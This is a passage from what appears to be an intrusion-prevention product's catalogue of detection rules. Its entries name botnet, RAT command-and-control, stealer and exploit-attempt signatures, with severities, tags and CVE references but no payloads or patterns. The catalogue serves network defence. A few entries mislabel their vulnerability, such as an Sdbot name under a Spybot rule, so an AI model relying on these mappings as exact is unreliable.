Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Gaobot.worm.gen.by-Malware
Description:
Back to top

Generic_CS-W32/Gaobot.worm.gen.d-Activity

About this situation: W32/Gaobot.worm.gen.d activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Gaobot.worm.gen.d-Malware
Description:
Back to top

Generic_CS-W32/Gaobot.worm.gen.e-Activity

About this situation: W32/Gaobot.worm.gen.e activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Gaobot.worm.gen.e-Malware
Description:
Back to top

Generic_CS-W32/Gaobot.worm.gen.j-Activity

About this situation: Detected W32/Gaobot.worm.gen.j activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Gaobot.worm.gen.j-Malware
Description:
Back to top

Generic_CS-W32/Ircbot.gen-Connect

About this situation: W32/Ircbot.gen activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Ircbot.gen-Malware
Description:
Back to top

Generic_CS-W32/Ircbot.worm!ms05-039-Activity

About this situation: W32/Ircbot.worm!ms05-039 activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Ircbot.worm!ms05-039-Malware
Description:
Back to top

Generic_CS-W32/Ircbot.worm.gen-Activity

About this situation: W32/Ircbot.worm.gen activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Ircbot.worm.gen-Malware
Description:
Back to top

Generic_CS-W32/Mydoom.bg@mm-Activity

About this situation: W32/Mydoom.bg@mm activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Mydoom.bg@mm-Malware
Description:
Back to top

Generic_CS-W32/Mytob.gen@mm-Activity

About this situation: W32/Mytob.gen@mm activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Mytob.gen@mm-Malware
Description:
Back to top

Generic_CS-W32/Nuwar@mm-Encrypted-Traffic

About this situation: W32/Nuwar@MM Encrypted Traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Nuwar@mm-Malware
Description:
Back to top

Generic_CS-W32/Oscarbot-Activity

About this situation: W32/Oscarbot activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Oscarbot-Malware
Description:
Back to top

Generic_CS-W32/Poebot.dam-Activity

About this situation: W32/poebot.dam activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Poebot.dam-Malware
Description:
Back to top

Generic_CS-W32/Poebot.gen-Activity

About this situation: W32/Poebot.gen activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Poebot.gen-Malware
Description:
Back to top

Generic_CS-W32/Polybot.dr-Activity

About this situation: W32/Polybot.dr activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Polybot.dr-Activity
Description:
Back to top

Generic_CS-W32/Polybot.gen!irc-Activity

About this situation: W32/Polybot.gen!irc Activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Polybot.gen!irc-Malware
Description:
Back to top

Generic_CS-W32/Polybot@mm-Activity

About this situation: W32/polybot@mm activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Polybot@mm-Malware
Description:
Back to top

Generic_CS-W32/Sdbot.g.gen-Activity

About this situation: W32/Sdbot.g.gen activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Sdbot.g.gen-Malware
Description:
Back to top

Generic_CS-W32/Sdbot.worm.gen-Activity

About this situation: W32/Sdbot.worm.gen activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Sdbot.worm.gen-Malware
Description:
Back to top

Generic_CS-W32/Sdbot.worm.gen-Activity-2

About this situation: W32/Sdbot.worm.gen activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Sdbot.worm.gen-Malware
Description:
Back to top

Generic_CS-W32/Sdbot.worm.gen.bj-Activity

About this situation: W32/Sdbot.worm.gen.bj activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Sdbot.worm.gen.bj-Malware
Description:
Back to top

Generic_CS-W32/Sdbot.worm.gen.by-Activity

About this situation: W32/Sdbot.worm.gen.by activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Sdbot.worm.gen.by-Malware
Description:
Back to top

Generic_CS-W32/Spybot.worm.gen.bj-Connect

About this situation: W32/Spybot.worm.gen.bj activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Sdbot.worm.gen.bj-Malware
Description:
Back to top

Generic_CS-W32/Spybot.worm.gen.e-Activity

About this situation: W32/Spybot.worm.gen.e activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Spybot.worm.gen.e-Malware
Description:
Back to top

Generic_CS-W32/Spybot.worm.gen.f-Activity

About this situation: W32/Spybot.worm.gen.f activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Spybot.worm.gen.f-Malware
Description:
Back to top

Generic_CS-W32/Spybot.worm.gen.o-Activity

About this situation: W32/Spybot.worm.gen.o activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Spybot.worm.gen.o-Malware
Description:
Back to top

Generic_CS-WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WellinTech KingSCADA detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, WellinTech KingSCADA, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1339-5242
Vulnerability: WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow

About this situation: An attempt to exploit WellinTech-Kingview-SCADA-Heap-Buffer-Overflowdetected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, WellinTech KingView, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: WellinTech-KingView-SCADA-Heap-Buffer-Overflow
Description: CVE References: CVE-2011-0406
Back to top

Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow-2

About this situation: An attempt to exploit WellinTech-Kingview-SCADA-Heap-Buffer-Overflowdetected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, WellinTech KingView, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: WellinTech-KingView-SCADA-Heap-Buffer-Overflow
Description: CVE References: CVE-2011-0406
Back to top

Generic_CS-WellinTech-KingView-SCADA-Historyserver.exe-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WellinTech KingView detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, WellinTech KingView, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: WellinTech-KingView-SCADA-Historyserver.exe-Opcode-3-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Western-Digital-Arkeia-Remote-Code-Execution

About this situation: An attempt to exploit a Western Digital Arkeia Remote Code Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Arkeia Network Backup, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Western-Digital-Arkeia-Remote-Code-Execution
Description:
Back to top

Generic_CS-WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785

About this situation: An attempt to exploit a vulnerability in Progress WhatsUp Gold detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Progress WhatsUp Gold, CVE2024, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1807-5242
Last changed: sgpkg-ips-1807-5242
Vulnerability: WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785
Description:
Back to top

Generic_CS-WinCC-Hmiload-Exe-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Siemens SIMATIC WinCC detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Siemens SIMATIC WinCC, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: WinCC-Hmiload-Exe-Directory-Traversal
Description:
Back to top

Generic_CS-WinComLPD-Total-Integer-Overflow

About this situation: WinComLPD Total Integer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, WinComLPD Total, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: WinComLPD-Total-Integer-Overflow
Description:
Back to top

Generic_CS-Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679

About this situation: An attempt to exploit a vulnerability in Windows Kerberos detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679
Description:
Back to top

Generic_CS-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809

About this situation: An attempt to exploit a vulnerability in Windows Kerberos detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2025-04, CVE2025, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
Description:
Back to top

Generic_CS-Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2023-05, CVE2023, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1597-5242
Last changed: sgpkg-ips-1602-5242
Vulnerability: Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941
Description:
Back to top

Generic_CS-Windows-RDP-CVE-2019-0708

About this situation: An attempt to exploit a vulnerability in the Windows RDP service was detected.
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1161-5242
Last changed: sgpkg-ips-1162-5242
Vulnerability: Windows-RDP-Remote-Code-Execution-CVE-2019-0708
Description:
Back to top

Generic_CS-Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896

About this situation: A remote code execution vulnerability in Microsoft Windows RDP server.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2020-10, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1287-5242
Vulnerability: Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896
Description:
Back to top

Generic_CS-Winhopstealer-Trojan

About this situation: Winhopstealer trojan traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Winhopstealer-Trojan
Description:
Back to top

Generic_CS-Winos4.0-Post-Exploitation-Framework-C2-Traffic

About this situation: Winos 4.0 post exploitation framework command and control traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Vulnerability: Winos4.0-Post-Exploitation-Framework-C2-Traffic
Description:
Back to top

Generic_CS-X.org-X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in X.Org Foundation X Font Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, XOrg Font Server, CVE2007, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: XFSP_X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow
Description:
Back to top

Generic_CS-xArrow-SCADA-HMI-DoS-Ver1

About this situation: A vulnerability in xArrow SCADA control software, decompression NULL pointer, allowing DoS.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, xArrow, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: xArrow-SCADA-HMI-DoS-Ver1
Description:
Back to top

Generic_CS-xArrow-SCADA-HMI-DoS-Ver2

About this situation: A vulnerability in xArrow SCADA control software, possible heap corruption, allowing DoS.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, xArrow, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: xArrow-SCADA-HMI-DoS-Ver2
Description:
Back to top

Generic_CS-Xarvester-Spambot

About this situation: Xarvester spambot command and control channel communication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Xarvester spambot, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-272-4219
Vulnerability: Xarvester-Spambot
Description:
Back to top

Generic_CS-XLink-Omni-NFS-Server-Buffer-Overflow

About this situation: XLink Omni NFS Server 5.2 Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 2000, Any Hardware, XLink Omni, CVE2006, Windows 2000 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: XLink-Omni-NFS-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in XStream XStream detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, XStream, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion
Description:
Back to top

Generic_CS-Xymon-Daemon-Gather-Information

About this situation: An attempt to exploit a vulnerability in Xymon Daemon detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Xymon, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Vulnerability: Xymon-Daemon-Gather-Information
Description:
Back to top

Generic_CS-Yoddos-Activity

About this situation: Yoddos activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Yoddos
Description:
Back to top

Generic_CS-Yokogawa-CENTUM-CS3000-BKBCopyD.exe-Stack-Based-Buffer-Overflow

About this situation: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKBCopyD.exe
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows XP SP3, Any Hardware, Yokogawa CENTUM, CVE2014, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Yokogawa-CENTUM-CS3000-BKBCopyD.exe-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Yokogawa-CENTUM-CS3000-BKHOdeq.exe-Stack-Based-Buffer-Overflow

About this situation: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKHOdeq.exe
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 2003 SP2, Windows XP SP3, Any Hardware, Yokogawa CENTUM, CVE2014, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: Yokogawa-CENTUM-CS3000-BKHOdeq.exe-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Yokogawa-CS3000-Buffer-Overflow

About this situation: An attempt to exploit a Yokogawa CS3000 Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Yokogawa CENTUM, CVE2014, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1338-5242
Vulnerability: Yokogawa-CS3000-Buffer-Overflow
Description:
Back to top

Generic_CS-Ysoserial-Generated-DotNet-Serialized-Object

About this situation: .NET serialized object with Ysoserial gadget chain characteristics detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Ysoserial-Generated-DotNet-Serialized-Object
Description:
Back to top

Generic_CS-Zabbix-Agent-Command-Injection

About this situation: An attempt to exploit a Zabbix Agent Command Injection vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-1770-5242
Vulnerability: Zabbix-Agent-Command-Injection
Description:
Back to top

Generic_CS-Zabbix-Arbitrary-Command-Execution

About this situation: An attempt to exploit a Zabbix Arbitrary Command Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-723-5211
Vulnerability: Zabbix-Arbitrary-Command-Execution
Description:
Back to top

Generic_CS-Zabbix-Audit-Log-SQL-Injection-CVE-2024-22120

About this situation: An attempt to exploit a vulnerability in Zabbix detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1739-5242
Last changed: sgpkg-ips-1739-5242
Vulnerability: Zabbix-Audit-Log-SQL-Injection-CVE-2024-22120
Description:
Back to top

Generic_CS-Zabbix-Server-Active-Proxy-Trapper-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zabbix detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2017, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Zabbix-Server-Active-Proxy-Trapper-Command-Injection
Zabbix-Server-Active-Proxy-Trapper-Command-Injection-Bypass-CVE-2020-11800
Description:
Back to top

Generic_CS-Zend-Zend-Server-Java-Bridge-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Zend Technologies Zend Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Zend Server, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Zend-Zend-Server-Java-Bridge-Remote-Code-Execution
Description:
Back to top

Generic_CS-ZeroAccess-Traffic

About this situation: ZeroAccess traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: ZeroAccess-Botnet
Description:
Back to top

Generic_CS-Zeromq-Libzmq-Curve-Server-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ZeroMQ libzmq detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ZeroMQ libzmq, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1177-5242
Vulnerability: Zeromq-Libzmq-Curve-Server-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Zeromq-Libzmq-V2_Decoder-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in ZeroMQ libzmq detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ZeroMQ libzmq, CVE2019, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1445-5242
Vulnerability: Zeromq-Libzmq-V2_Decoder-Integer-Overflow
Description:
Back to top

Generic_CS-Zoho-Manageengine-Datasecurity-Plus-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine DataSecurity Plus detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine DataSecurity Plus, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Zoho-Manageengine-Datasecurity-Plus-Authentication-Bypass
Description:
Back to top

Generic_CS-Zoho-Manageengine-Datasecurity-Plus-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine DataSecurity Plus detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine DataSecurity Plus, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Zoho-Manageengine-Datasecurity-Plus-Directory-Traversal
Description:
Back to top

Generic_CS_NanoCore-RAT-C2-Traffic

About this situation: NanoCore RAT C2 traffic was detected
Context: TCP Client Stream Unknown
